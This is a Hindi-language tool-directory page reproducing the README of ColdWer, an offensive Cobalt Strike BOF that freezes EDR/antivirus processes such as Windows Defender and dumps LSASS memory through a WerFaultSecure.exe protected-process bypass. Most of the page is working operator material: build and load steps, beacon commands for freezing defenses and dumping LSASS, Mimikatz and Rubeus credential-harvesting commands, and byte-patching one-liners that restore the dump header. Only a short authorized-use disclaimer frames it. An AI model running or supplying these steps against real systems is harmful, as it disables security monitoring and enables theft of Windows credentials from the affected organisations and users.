Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ColdWer — Cobalt Strike BOF जो EDR/AV प्रक्रियाओं को फ्रीज़ करता है और WerFaultSecure.exe PPL बाईपास का उपयोग करके LSASS को डंप करता है | Kitploit
उपकरण/GitHubGitHub/0xsh3llf1r3/coldwer
विशेषाधिकार वृद्धिशोषणपार्श्व आंदोलनपोस्ट-शोषणरेड टीमिंगपेलोड डेवलपमेंट
GitHub0xsh3llf1r3/coldwer

ColdWer

Cobalt Strike BOF जो EDR/AV प्रक्रियाओं को फ्रीज़ करता है और WerFaultSecure.exe PPL बाईपास का उपयोग करके LSASS को डंप करता है

रिपॉजिटरी देखें
144236 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ColdWer
आपके एंडपॉइंट पर एक शीत युद्ध।

Stars Forks License


🥶 ColdWer

ColdWer WerFaultSecure.exe PPL बाईपास का उपयोग करके आधुनिक Windows सिस्टम पर EDR/AV प्रक्रियाओं को फ़्रीज़ करता है और LSASS मेमोरी डंप करता है।

root@kitploit:~
C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)

अपने EDR/AV को फ़्रीज़ करें। जो चाहिए वो निकालें। ठंडे रहें।


👤 लेखक

Sh3llf1r3 (@0xsh3llf1r3)


🙏 श्रेय

यह प्रोजेक्ट TwoSevenOneT (@TwoSevenOneT) के शोध पर आधारित है:

प्रोजेक्टविवरण
EDR-Freezeमूल EDR फ़्रीज़ तकनीक
WSASSWerFaultSecure के माध्यम से LSASS डंप

अंतर्निहित तकनीकों का सारा श्रेय TwoSevenOneT को जाता है।


🔥 विशेषताएँ


🚀 आरंभ करना

📋 पूर्वापेक्षाएँ

  • Cobalt Strike 4.x
  • उच्च अखंडता बीकन (Administrator/SYSTEM)

💾 स्थापना

  1. रिपॉजिटरी क्लोन करें:
root@kitploit:~
git clone https://github.com/0xsh3llf1r3/ColdWer.git
  1. Cobalt Strike में आक्रामक स्क्रिप्ट लोड करें:
  • Cobalt Strike → Script Manager पर जाएँ
  • Load पर क्लिक करें
  • cw/coldwer.cna चुनें

📦 स्रोत से निर्माण

root@kitploit:~
# स्रोत निर्देशिका पर जाएँ
cd src/

# BOF संकलित करें (MinGW आवश्यक)
make

# या मैन्युअल रूप से:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

📥 त्वरित डाउनलोड

  1. Releases पर जाएँ
  2. coldwer.o और coldwer.cna डाउनलोड करें
  3. दोनों को एक ही फ़ोल्डर में रखें
  4. Cobalt Strike में coldwer.cna लोड करें

🖥️ उपयोग

❄️ EDR/AV फ़्रीज़ करें

root@kitploit:~
# Windows Defender PID खोजें
beacon> ps

# प्रक्रिया फ़्रीज़ करें
beacon> cw-freeze 1337

# EDR/AV फ़्रीज़ होने पर अपने कमांड निष्पादित करें
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# समाप्त होने पर अनफ़्रीज़ करें
beacon> cw-unfreeze

🔓 LSASS डंप करें

root@kitploit:~

# चरण 1: Win8.1 WerFaultSecure.exe अपलोड करें
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# चरण 2: LSASS PID खोजें
beacon> ps

# चरण 3: LSASS डंप करें
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# चरण 4: डंप डाउनलोड करें
beacon> download C:\Windows\Temp\lsass.dmp

🔧 डाउनलोड के बाद

मिनीडंप प्रारूप पुनर्स्थापित करने के लिए फ़ाइल हेडर बदलें:

मूल (PNG)इसे बदलें (MDMP)
89 50 4E 474D 44 4D 50

हेडर पुनर्स्थापित करने के कमांड:

तरीकाकमांड
Pythonopen('lsass.dmp','r+b').write(b'MDMP')
Bashprintf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
PowerShell$f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

फिर Mimikatz से पार्स करें:

root@kitploit:~
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

📋 कमांड

कमांडविवरण
cw-freeze <PID> [Path]प्रक्रिया फ़्रीज़ करें
cw-unfreezeपहले फ़्रीज़ की गई प्रक्रिया को अनफ़्रीज़ करें
cw-dump <PID> <Path>LSASS मेमोरी डंप करें

📝 उदाहरण

root@kitploit:~
# डिफ़ॉल्ट पथ से फ़्रीज़ करें
beacon> cw-freeze 1337

# कस्टम WerFaultSecure.exe का उपयोग करें
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# LSASS डंप करें
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# समाप्त होने पर अनफ़्रीज़ करें
beacon> cw-unfreeze

✅ समर्थित लक्ष्य

लक्ष्यस्थिति
Windows Defender (MsMpEng.exe)✅ काम करता है
LSASS (lsass.exe)✅ काम करता है
अन्य PPL प्रक्रियाएँ✅ काम करता है

⚠️ सीमाएँ

कर्नेल-मोड स्व-संरक्षण वाले EDR के विरुद्ध काम नहीं करता:

EDRस्थिति
Elastic Endpoint❌ अवरुद्ध
CrowdStrike Falcon❌ अवरुद्ध
SentinelOne❌ अवरुद्ध
Carbon Black❌ अवरुद्ध

⚙️ यह कैसे काम करता है

root@kitploit:~
1. 🚀 WerFaultSecure.exe को PPL (WinTcb स्तर) के रूप में लॉन्च करें
                    ↓
2. 🎯 WerFaultSecure लक्ष्य प्रक्रिया से जुड़ता है
                    ↓
3. ⏸️  MiniDumpWriteDump सभी लक्ष्य थ्रेड को निलंबित करता है
                    ↓
4. 🥶 WerFaultSecure को स्वयं निलंबित करें → लक्ष्य फ़्रीज़ रहता है
                    ↓
5. ✅ अपने कमांड निष्पादित करें (EDR/AV नहीं देख सकता!)
                    ↓
6. 🔥 WerFaultSecure को समाप्त करें → लक्ष्य अनफ़्रीज़ हो जाता है

🔑 Win8.1 WerFaultSecure क्यों?

संस्करणआउटपुट
Windows 10/11केवल एन्क्रिप्टेड डंप
Windows 8.1कच्चा अनएन्क्रिप्टेड डंप

🔍 समस्या निवारण


⚖️ अस्वीकरण

root@kitploit:~
⚠️ केवल अधिकृत सुरक्षा परीक्षण के लिए

यह उपकरण इसके लिए अभिप्रेत है:
- अधिकृत पेनिट्रेशन परीक्षण
- लिखित अनुमति के साथ रेड टीम संचालन
- नियंत्रित वातावरण में सुरक्षा अनुसंधान

लेखक इस उपकरण के किसी भी दुरुपयोग या इससे होने वाली क्षति के लिए उत्तरदायी नहीं है।
कंप्यूटर सिस्टम में अनधिकृत पहुँच गैरकानूनी है।

📜 लाइसेंस

MIT लाइसेंस - LICENSE देखें


🥶 ठंडे रहें। चुप रहें। 🥶

⭐ यदि यह उपयोगी लगे तो इस रिपॉजिटरी को स्टार करें! ⭐

टूल डाउनलोड करें
विशेषताविवरण
❄️ फ़्रीज़EDR/AV प्रक्रियाओं को कोमा अवस्था में डालें
🔓 डंपPPL को बायपास करके LSASS मेमोरी निकालें
🛡️ PPL बाईपासWinTcb स्तर पर WerFaultSecure.exe का लाभ उठाएं
⚡ तेज़इनलाइन BOF निष्पादन
🎯 मैन्युअल नियंत्रणआप तय करें कब फ़्रीज़ और अनफ़्रीज़ करना है
त्रुटिकारणसमाधान
फ़ाइल नहीं मिलीअमान्य पथWerFaultSecure.exe पथ जाँचें
पहुँच अस्वीकृतकम विशेषाधिकारAdministrator/SYSTEM के रूप में चलाएँ
अमान्य हस्ताक्षरअहस्ताक्षरित बाइनरीउचित रूप से हस्ताक्षरित WerFaultSecure.exe का उपयोग करें
प्रक्रिया मौजूद नहीं हैगलत PIDps कमांड से PID सत्यापित करें
लक्ष्य सुरक्षितकर्नेल सुरक्षाEDR स्व-संरक्षण (बायपास नहीं किया जा सकता)
पहले से फ़्रीज़ हैस्थिति अटक गईपहले cw-unfreeze चलाएँ